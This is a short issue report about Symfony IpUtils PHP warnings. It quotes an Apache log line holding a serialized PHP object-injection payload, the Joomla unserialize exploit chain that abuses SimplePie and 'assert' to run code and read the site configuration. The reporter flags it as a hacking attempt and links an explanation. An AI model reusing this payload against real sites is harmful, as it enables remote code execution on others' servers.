Closed
Description
Hi, I have found these logs:
[Fri Jan 15 11:28:23 2016] [error] [client 10.114.101.16] PHP Warning: inet_pton(): in /vendor/symfony/symfony/src/Symfony/Component/HttpFoundation/IpUtils.php on line 116
[Fri Jan 15 11:28:23 2016] [error] [client 10.114.101.16] PHP Notice: Undefined offset: 1 /vendor/symfony/symfony/src/Symfony/Component/HttpFoundation/IpUtils.php on line 122
The related apache log:
10.114.101.16 }__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:48:\"print md5(123123123);JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd, 85.25.198.199 - - [15/Jan/2016:11:28:23 +0100] "GET / HTTP/1.1" 200 30689 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0"
Looks like an hacking attempt: https://blog.cloudflare.com/the-joomla-unserialize-vulnerability/